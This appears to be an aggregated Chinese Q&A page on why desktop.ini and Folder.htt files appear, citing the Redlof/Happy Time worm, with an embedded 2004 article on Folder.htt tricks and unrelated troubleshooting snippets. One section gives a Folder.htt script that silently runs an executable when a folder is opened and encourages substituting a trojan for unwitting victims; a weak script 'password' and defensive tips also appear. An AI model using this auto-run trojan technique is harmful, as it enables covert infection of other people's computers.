我在复制文件时,会多出两个文件:desktop.ini;Folder.htt,是怎么回事?
VBS.Redlof.C是一种具有加密性质的蠕虫病毒,它感染HTML文件。 蠕虫会尝试修改一些注册表键值,虽然这些修改并不会产生什么错误。Redlof.C感染%Windows%\Web\Folder.htt,并拷贝自己到下面这些地方:
%Windows%\System\Blank.htm
%Windows%\Folder.htt
%Windows%\System32\Folder.htt
因为Folder.htt是Windows IE浏览器作为摸版运行时所必要的默认文件。所以,这会导致当浏览目录时蠕虫就会被运行。如果目录中没有文件Desktop.ini,蠕虫就会创建一个Desktop.ini用来运行Folder.htt。
Redlof.C感染具有下列扩展名的文件:.HTML, .HTM, HTT, .ASP, .JSP, .PHP
蠕虫的一个有效载荷是在2月4月6月8月10月12月的30号,会重命名文件"win.ini" 为"won.chk" 以及重命名 "system.ini" 为 "system.chk"。
当打开一个HTML文档时,蠕虫会尝试利用"Microsoft Virtual Machine ActiveX Component"这个漏洞。微软已经发布了相应的补丁程序,具体的信息可以访问这里: http://www.microsoft.com/technet/security/bulletin/MS00-075.asp
这个是中毒了
灰鸽子?
呵呵
恭喜啊
别听他们胡说
这是中了“快乐时光”病毒,到毒霸或者瑞星网站上下载一个专杀工具
桌面和文件夹自定义布局,在有一段时间被[欢乐时光]病毒利用搞得天翻地覆。在我的电脑搜索一下这两个文件,搜索到的可以全部删除。
你可以对一个文件夹里做做试验,先删除掉这两个文件,然后该文件夹里不选对在空白处按右键,点自定义桌面,确定后这两个文件就会马上生成。
不是病毒的话不要删,文件夹会改模样的——比如将windows的这二个文件copy到d盘摸文件夹,刷新后会有什么改变?——“隐藏该文件夹内容”。——删掉就没了。
关于desktop.ini folder.htt~
浅析Desktop.ini文件的一些奇妙用途
发布日期: 2004-12-30 20:59:28 作者: 文/阿雄 字体:【大 中 小】【打印本页】
娱乐/搞笑/体育视频免费看! 彩信/短信开发平台 免费测试您的IT潜质! 美萍洗浴、餐饮管理系统
您还记得当初大名鼎鼎的“欢乐时光”病毒吗?感染该病毒的硬盘中会有多个Desktop.ini和Folder.htt文件,就算你删除了目录中的这两个文件,当你再次打开该目录时,它们又像幽灵一样出现了。
再问大家一个与此相关的问题:在Windows系统中,重复文件最多的什么呢?答案是Desktop.ini文件!在Windows目录及其下的Favorites、System、Fonts、Tasks文件夹中都有该文件的身影!正是由于该文件的存在,使得它们在外观或其他方面也与普通的文件夹有所区别。下面笔者就谈谈这两个文件的一些奇妙用途。
一、给文件夹加上密码
在学校的机房和校园网络的管理中,是否经常会碰到这样的情况:一些计算机常因学生误删了Windows目录或SYSTEM目录下的一些系统文件而导致无法正常启动。是否有方法可以把Windows及其它重要目录保护起来呢?方法是有的,我们只需在这个Folder.htt文件中进行必要的修改,就可改变文件夹打开的方式。比如,要想在打开该文件夹前先进行安全认证,可这样修改这个Folder.htt。
在C盘的Windows文件夹中找到Folder.htt文件(该文件为隐藏文件,并且后来经过编辑与笔者共同验证,该文件不同的系统内容也不尽相同,本文种主要是Windows 98下的),打开Folder.htt文件。找到以下内容:
<a href=''class=command onclick='ShowFiles(); ShowWinStat(winStat); return false;' onMouseOver='ShowWinStat(!winStat); return true;' onMouseOut='ShowWinStat(winStat); return true;' onFocus='ShowWinStat(!winStat); return true;' onBlur='ShowWinStat(winStat); return true;'>显示文件</a>。";
将其修改为:
<a href=''class=command onclick='ShowFiles(); ShowWinStat(winStat); return false;' onMouseOver='ShowWinStat(!winStat); return true;' onMouseOut='ShowWinStat(winStat); return true;' onFocus='ShowWinStat(!winStat); return true;'
onBlur='ShowWinStat(winStat); return true;'>输入密码</a>。";
(2)找到function ShowFiles() {
Info.innerHTML = L_Intro_Text + "<br><br>" + L_Prompt_Text;
showFiles = true;
document.all.FileList.style.display = "";
document.all.Brand.style.display = "none";
FixSize();
}
修改为: ★function ShowFiles()
{var password=prompt("请输入密码:","");
if (password=="你的密码"){Info.innerHTML = L_Intro_Text + "<br><br>" + L_Prompt_Text;
showFiles = true;
document.all.FileList.style.display = "";
document.all.Brand.style.display = "none";
FixSize();}
else{alert("警告,密码错误!您无权浏览该目录");}}
(3)保存修改后的Folder.htt文件,退出Windows文件夹。
完成上述操作步骤后,再进入Windows目录时,系统提示输入密码,只有输入正确的密码才能进行该目录。通过修改打开行为的代码,就可实现对某个目录的简单加密。
当然,这种加密目录很容易解开:不使用Web方式打开文件夹,避开执行该程序,或直接从DOS中进入该文件夹都可绕开密码的输入。
如果你使用的是Windows 2000系统,可以找到
………………
<script language="JavaScript">
然后在后面加上以下代码:
var pass =prompt("enter the password")
if (pass!="密码")
{window.location="d:"}
就可以给文件夹加上访问口令!这样你的文件夹就多了一层保护。
二、任意文件夹和硬盘分区的保护
根据同样的原理,我们可对任意文件夹及硬盘分区设置保护口今。具体操作步骤如下:
(1)打开要加密的文件夹或硬盘分区,选择文件菜单中的“查看→自定义文件夹”。
(2)在打开的“自定义文件夹”窗口中,如图1所示选择“创建或编辑HTML文档”,单击“下一步”按钮,再单击“下一步”按钮,关闭记事本编辑窗口,单击“完成”按钮。在当C盘Windows目录下找到Folder.htt文件,把它复制到当前文件夹中,覆盖原来的Folder.htt文件。
(3)打开Folder.htt文件,找到★var L_Intro_Text= "<b><font color=red>警告</font></b><br><br>修改该文件夹的内容可能导致程序运行不正常。";★(警告内容),将其修改为“自定义的内容”。完成Folder.htt的文件修改后,再进入相应的文件夹或硬盘分区,则需要提供正确口令,否则无法显示该文件夹的内容。
图1
(一)、利用文件夹安装木马
黑客可以利用文件夹来安装木马,其目的是对方只要打开某个文件夹就自动安装木马文件。知己知彼方能百战不殆,让我们了解一下其原理和方法。
图2
[page]
1.先在以目录下建立一个文件夹test文件夹,进入刚建的文件夹test点击“工具”菜单选择“文件夹选项”项(图2);出来文件夹选项对话框如图所示(图3),把“隐藏受保护的操作系统文件(推荐)”前面打上“√”,接着出现一个警告窗口,如图所示(图4),直接点击“是”。再把“隐藏文件和文件夹”下选择“显示所有文件和文件夹”,最后点击确定在本目录下出现了Folder settings隐藏文件夹和Desttop.ini隐藏文件如图所示(图5)。
图3
图4
图5
2.现在点击“查看”菜单选择“自定义文件夹”项(图6),打开的“自定义文件夹”窗口,选择其中的“创建或编辑HTML文档”,单击“下一步”按钮,再单击“下一步”按钮,然后关闭记事本编辑窗口,单击“完成”按钮,就把文件夹设置成按WEB方式打开文件夹。再打开要放木马的文件夹,我们就在这个文件夹里测试。Folder.Htt是文件夹的模板文件,现在我们修改文件夹的模板文件,在里面插入一端自动运行程序的代码:
<script language="javascript">
run_exe="<OBJECT ID="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject""
run_exe+="CODEBASE="test.exe#version=1,1,1,1">"
run_exe+="<PARAM NAME="_Version" value="65536">"
run_exe+="</OBJECT>"
document.open();
document.clear();
document.writeln(run_exe);
document.close();
</script>
图6
就是这段里面的test.exe为你要安装的木马文件,这里为了给大家看到效果我运行的是LC4。
3.现在我们把要运行的test.exe文件也copy到这个文件夹里,好了,我们现在把文件查看属性修改回去,就是步骤1的逆过程。
4.OK,如果你不想要木马立即运行,请把窗口直接关闭,等管理员来运行吧。让我们来看看效果,退出test文件夹然后双击test文件夹图标,如图所示(图7),怎么样,运行了吧,大家可以把test.exe换成小点的木马,这样对方就在不知道的情况下给自己装了木马。其实大家如果要有什么文件要隐藏的话,就可以放到folder.htt和同目录下,把文件夹属性设置回去以后,用搜索都找不到这个文件。
图7
三、总结
好了,Folder.htt和Desktop.ini文件的好的应用和需要注意的都讲了,是不是觉得很有意思也很恐怖哦!现在我们说一下防范与解决办法:
1.查看文件夹时,去掉以“Web页方式”的选项。虽然我们看不见什么个性化目录了,但我们换来是安全,我认为值!但是,也请大家注意,如果不采用“WEB方式”查看文件夹前面介绍过的技巧和应用就不能正常显示了,有得就有失啊。
2.如果没有什么需要,去掉默认共享和共享目录。要是需要,公共用户也要加上密码,密码只有内部人知道。只要能上传文件,你的机器就很危险。除了上边的方法,还可以用MIME漏洞,ASP漏洞入侵,如果是Windows 98还有共享方法。所以一定要把好关!
3.脚本病毒的一大特征就是利用WSH。要是服务器最好去掉WSH,这样能低御许多脚本病毒。方法是:在“控制面板”里选择“添加/删除程序”,选择“Windows安装程序”里的附件,再选择“详细资料”中的“Windows Scripting Host”把它卸载掉。
如果你能确定这几个文件不是系统文件,你就可以用一下方法:
1.打开记事本,输入:
DEL /F /A /Q \\?\%1
RD /S /Q \\?\%1
2.保存后改文件扩展名为“.bat”
3.你会看见文件会变成ms-dos批处理文件,然后把无法删除的文件拖到这个文件的上面,释放鼠标,要删除的文件就会不见了。
各位老师好:在我的电脑界面多出两个文件夹,如何删除
答:1.可以手动找到这些键值后删除 也就是 找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders\ 下有一个{59031a47-3f72-44a7-89c5-5595fe6b30ee} 删除就好了 2.这段话 用文本文档另存为*.reg格式 Windows Registry Editor Version 5.00 [...
复制一个文件或文档在同一个目录下粘帖有的可以粘帖(文件名比原来的多...
答:文件名在同目录下是不能重复的,如果重复的话就相当于一个地址对应了两个文件了。。
为什么我在备份系统时会出现两个文件在GHOST文件夹里?
答:【SYSTE001.GHS】和【SYSTEM.GHO】都是镜像文件,好像是FAT32格式的系统最大只支持2G的文件,所以GHOST把超过的部分另外保存为一个文件,如果超过4G就会保存为3个文件以此类推。恢复时你只要选择【SYSTEM.GHO】就可以了,【SYSTE001.GHS】里的内容会自动还原的。
...D盘下就会出现两个文件:autorun和pagefile,咋回事?
答:然后再到C盘把上面所列出来的文件都删掉!中途注意不要双击到其中一个文件,否则所有步骤都要重新来过! 然后再注销。我在奋战过程中,把那些文件删掉后,所有的exe文件全都打不开了,运行cmd也不行。然后,到C:\Windows\system32 里,把cmd.exe文件复制出来,比如到桌面,改名成cmd.com 嘿嘿 我也...
Windows7系统复制文件怎么才不出现副本两个字
答:我们在使用的时候,经常会复制一些图片或文档在同一个文件中,那么这时候系统就会自动默认命名为原文件名加上副本两个字,而复制完了还要一个更改根式麻烦,那么有什么方法可以在复制文件怎么才不出现副本两个字呢?现在为大家大家讲解具体的方法如下。推荐:1、使用快捷键“Win+r”,在运行窗口中,输入...
...CAD时,打开一个文件,同时就会出现另外两个文件(*.dwl,*.dwl2)。删...
答:会出现两个“.dwl .dwl2”的文件,如下:2、此时切换到绘图区,然后鼠标右键,点击下面的“选项”:3、然后点击上面的“打开和保存”,在页面中找到“每次保存时均创建备份副本”,将其前面的勾去掉,然后按回车键保存设置:4、这时候再看桌面,已经没有了刚才的两个文件了:...
为什么win10新建文档后会出现两个图标而且第二个打不开?
答:解释:新建的word文档出现两个图标,而且第二个是隐藏的,解决方法:如图所示:打开--查看--最右边有个“选项”打开“查看”选项卡找到“显示隐藏的文件,文件夹和驱动器”点一下,应用--确定。隐藏的第二个文档就消失了。
为什么我电脑插入U盘后会多出两个盘来?
答:2. 文件系统:U盘上的每个分区都需要使用文件系统进行格式化,以便操作系统能够读取和写入数据。常见的文件系统包括FAT32、NTFS等。每个文件系统类型在操作系统中都被视为一个独立的驱动器。3. 多功能U盘:有些U盘具有特殊的功能,例如加密、虚拟光驱等。这些功能会被识别为额外的驱动器。4. U盘模拟光驱...
win7自带的复制但保留两个文件功能没有了 怎么办
答:win10同理,复制相同文件会出现这个图片,按照下列步骤:(1)双击 比较两个文件的信息 选项 (2)取消左下角 跳过具有相同日期和大小的文件 选项;(3)把这两个文件都打上勾,按继续;(4)OK了。
每次用迅雷下载东西都会崩溃,并且桌面上会多出两个叫C5-0E554CBD-04C...
答:(4)卸载完成,但可能会残留下一些垃圾文件还需要自己进行删除;您可以重新进入迅雷7的安装目录中,查看余下文件,把没用文件重新删除即可 请卸载迅雷然后登录迅雷软件中心这个页面下载迅雷7最新版本安装包,重新安装在另外一个磁盘上尝试。(请不要覆盖安装,必须卸载安装,不然可能会覆盖上旧问题)感谢您...
